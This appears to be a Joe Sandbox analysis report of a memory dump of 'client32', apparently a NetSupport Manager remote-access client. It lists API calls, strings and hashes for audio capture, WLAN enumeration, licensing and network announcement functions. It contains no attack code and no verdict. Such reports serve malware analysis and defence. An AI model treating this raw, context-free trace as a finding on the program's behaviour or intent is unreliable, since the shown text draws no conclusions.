                                                                                          • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                          • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                          • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                          • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                          • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                          • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                        • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,B24479DC,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                        • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 1100B4E8
                                                                                        • _calloc.LIBCMT ref: 1100B519
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                        • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                        • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                        Strings
                                                                                        • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                        • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                        • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                        • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                        • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                        • Audio, xrefs: 1100B477
                                                                                        • DisableSounds, xrefs: 1100B472
                                                                                        • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
                                                                                        • String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
                                                                                        • API String ID: 1843377891-2362500394
                                                                                        • Opcode ID: d54540c7e3060f6c2cac778f33b6634bb13fd55eb5ecd4e5e988a912719bd391
                                                                                        • Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
                                                                                        • Opcode Fuzzy Hash: d54540c7e3060f6c2cac778f33b6634bb13fd55eb5ecd4e5e988a912719bd391
                                                                                        • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                        • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                                        • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                                        • _fgets.LIBCMT ref: 1102BB10
                                                                                        • _strtok.LIBCMT ref: 1102BB38
                                                                                          • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                                        • _fgets.LIBCMT ref: 1102BB74
                                                                                        • _strtok.LIBCMT ref: 1102BB88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                        • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 78526175-1484737611
                                                                                        • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                        • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                                        • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                        • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BB0
                                                                                        • LoadIconA.USER32(00000000,00007D0B,00000009,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BC5
                                                                                        • GetSystemMetrics.USER32(00000032,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BDE
                                                                                        • GetSystemMetrics.USER32(00000031,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027BE3
                                                                                        • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027BF3
                                                                                        • LoadIconA.USER32(11000000,00000491,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027C0B
                                                                                        • GetSystemMetrics.USER32(00000032,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027C1A
                                                                                        • GetSystemMetrics.USER32(00000031,00000000,?,?,?,?,?,?,1102F19C,?,?,View,Client,Bridge), ref: 11027C1F
                                                                                        • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027C30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                        • String ID: AdminUserAcknowledge$NSM.LIC$PCIRES$_License$product
                                                                                        • API String ID: 1946015-4092316048
                                                                                        • Opcode ID: b02a9135468864f94d42cdd8a8e1631fe42df336639f4756734e631bac92024b
                                                                                        • Instruction ID: b61cf272041b3986789d5db62e37e05cd74fdd835a4c3c17a37838dc7586d827
                                                                                        • Opcode Fuzzy Hash: b02a9135468864f94d42cdd8a8e1631fe42df336639f4756734e631bac92024b
                                                                                        • Instruction Fuzzy Hash: 4D51D8B5F4061A6BE711CBB08D81F6FB6ACAF54758F500469FA05E7680EB70E900C7A2
                                                                                        APIs
                                                                                          • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                          • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                          • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                        • LoadLibraryA.KERNEL32(wlanapi.dll), ref: 1115B61B
                                                                                        • GetProcAddress.KERNEL32(00000000,WlanOpenHandle,?,?,?,11058627), ref: 1115B634
                                                                                        • GetProcAddress.KERNEL32(?,WlanCloseHandle,?,?,?,11058627), ref: 1115B644
                                                                                        • GetProcAddress.KERNEL32(?,WlanEnumInterfaces,?,?,?,11058627), ref: 1115B654
                                                                                        • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList,?,?,?,11058627), ref: 1115B664
                                                                                        • GetProcAddress.KERNEL32(?,WlanFreeMemory,?,?,?,11058627), ref: 1115B674
                                                                                        • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                        • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                        • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                        • API String ID: 2439742961-1736626566
                                                                                        • Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                        • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                        • Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                        • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                        APIs
                                                                                          • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                          • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                          • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                          • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                          • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                        • _free.LIBCMT ref: 1112131D
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • _free.LIBCMT ref: 11121333
                                                                                        • _free.LIBCMT ref: 11121348
                                                                                        • GdiFlush.GDI32 ref: 11121350
                                                                                        • _free.LIBCMT ref: 1112135D
                                                                                        • _free.LIBCMT ref: 11121371
                                                                                        • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                        • DeleteObject.GDI32(?), ref: 1112139A
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00348B30), ref: 111213A4
                                                                                        • DeleteDC.GDI32(?), ref: 111213CB
                                                                                        • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                        • DeleteDC.GDI32(?), ref: 111213EB
                                                                                        • InterlockedDecrement.KERNEL32(111EA9C8,?,?,?,?,?,00348B30), ref: 111213F8
                                                                                        Strings
                                                                                        • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                        • String ID: Error deleting membm, e=%d
                                                                                        • API String ID: 3195047866-709490903
                                                                                        • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                        • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                        • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                        • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32(00000000), ref: 11053A8A
                                                                                          • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                          • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                          • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                          • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                          • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?), ref: 11041F52
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                                        • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                        • API String ID: 3701541597-1781216912
                                                                                        • Opcode ID: 4012d7bf7cd662acba1db7b145b2213c5f5b8098bdad5345146ff4be72192dc1
                                                                                        • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                        • Opcode Fuzzy Hash: 4012d7bf7cd662acba1db7b145b2213c5f5b8098bdad5345146ff4be72192dc1
                                                                                        • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                        APIs
                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,B24479DC,00000000,00000000,00000000), ref: 1103185A
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • EnumWindows.USER32(11030850,00000001), ref: 11031932
                                                                                        • EnumWindows.USER32(11030850,00000000), ref: 1103198C
                                                                                        • Sleep.KERNEL32(00000014,?,?,?,?,?,00000000), ref: 1103199C
                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 110319D3
                                                                                          • Part of subcall function 11028450: _memset.LIBCMT ref: 11028485
                                                                                          • Part of subcall function 11028450: wsprintfA.USER32 ref: 110284BA
                                                                                          • Part of subcall function 11028450: WaitForSingleObject.KERNEL32(?,000000FF), ref: 110284FF
                                                                                          • Part of subcall function 11028450: GetExitCodeProcess.KERNEL32(?,?), ref: 11028513
                                                                                          • Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 11028545
                                                                                          • Part of subcall function 11028450: CloseHandle.KERNEL32(?), ref: 1102854E
                                                                                        • Sleep.KERNEL32(0000000A,?,?,?,?,?,00000000), ref: 110319EB
                                                                                        • SendMessageA.USER32(?,00000010,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 11031AA7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: SleepWindows$CloseEnumHandle$CodeDirectoryExitMessageObjectProcessSendSingleWait__wcstoi64_memsetwsprintf
                                                                                        • String ID: "%sNSMExec.exe" %s$*ExitMetroDelay$Client$No new explorer wnd$\Explorer.exe$close new explorer wnd x%x
                                                                                        • API String ID: 3887438110-1852639040
                                                                                        • Opcode ID: fd22c120b4c951fa0c408bab330ae9316656ec978de79f2cd01a9ed51e5872a0
                                                                                        • Instruction ID: e4a431c807ee13d88d7f5229128d7dd46b9a7d2a7c1cad66ff6ecfc7424b804f
                                                                                        • Opcode Fuzzy Hash: fd22c120b4c951fa0c408bab330ae9316656ec978de79f2cd01a9ed51e5872a0
                                                                                        • Instruction Fuzzy Hash: 9D919D75E002299FDB14CF64CC80BEEF7F5AF89309F1441A9D9599B240EB31AE81CB91
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                        • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                        • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                        • CreateWindowExA.USER32 ref: 110CF400
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                        • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                        • API String ID: 4172769820-2231854162
                                                                                        • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                        • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                        • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                        • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                        APIs
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        • EnterCriticalSection.KERNEL32(?,View,limitcolorbits,00000000,00000000,B24479DC,111F10F8,111E6C98,?), ref: 110B3A64
                                                                                        • UnionRect.USER32(?,?,?), ref: 110B3B12
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 110B3CAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
